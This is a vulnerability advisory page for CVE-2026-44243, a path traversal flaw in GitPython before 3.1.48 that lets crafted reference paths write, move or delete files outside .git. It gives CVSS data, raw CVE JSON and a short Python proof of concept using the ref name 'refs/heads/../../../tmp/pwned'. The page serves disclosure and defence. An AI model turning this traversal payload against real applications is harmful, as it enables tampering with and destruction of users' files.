Security Vulnerability Report
CVE-2026-44243 CVSS 7.1 HIGH

CVE-2026-44243

Published: 2026-05-07 19:16:02
Last Modified: 2026-05-07 21:12:01

Description

GitPython is a python library used to interact with Git repositories. Prior to version 3.1.48, a vulnerability in GitPython allows attackers who can supply a crafted reference path to an application using GitPython to write, overwrite, move, or delete files outside the repository’s .git directory via insufficient validation of reference paths in reference creation, rename, and delete operations. This issue has been patched in version 3.1.48.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gitpython_project:gitpython:*:*:*:*:*:python:*:* - VULNERABLE
GitPython < 3.1.48

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import git
import os
import tempfile

# Initialize a test repository
repo_path = tempfile.mkdtemp()
repo = git.Repo.init(repo_path)

# Create a dummy file and commit to have a valid target SHA
with open(os.path.join(repo_path, 'test.txt'), 'w') as f:
    f.write('content')
repo.index.add(['test.txt'])
commit_sha = repo.index.commit('Initial commit').hexsha

# Define a malicious reference path using path traversal
# Attempting to write outside the .git directory (e.g., /tmp/pwned)
malicious_ref = 'refs/heads/../../../tmp/pwned'

try:
    print(f"Attempting to create reference: {malicious_ref}")
    # In vulnerable versions (< 3.1.48), this creates a file at /tmp/pwned
    repo.create_reference(malicious_ref, commit_sha)
    print("[+] PoC successful: File written outside .git directory.")
except Exception as e:
    print(f"[-] PoC failed (System might be patched): {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44243", "sourceIdentifier": "[email protected]", "published": "2026-05-07T19:16:02.227", "lastModified": "2026-05-07T21:12:00.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitPython is a python library used to interact with Git repositories. Prior to version 3.1.48, a vulnerability in GitPython allows attackers who can supply a crafted reference path to an application using GitPython to write, overwrite, move, or delete files outside the repository’s .git directory via insufficient validation of reference paths in reference creation, rename, and delete operations. This issue has been patched in version 3.1.48."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitpython_project:gitpython:*:*:*:*:*:python:*:*", "versionEndExcluding": "3.1.48", "matchCriteriaId": "9A98BC56-69A1-49DD-A1F8-7C4F981DDE66"}]}]}], "references": [{"url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.48", "source": "[email protected]", "tags": ["Patch", "Release Notes"]}, {"url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7545-fcxq-7j24", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-7545-fcxq-7j24", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}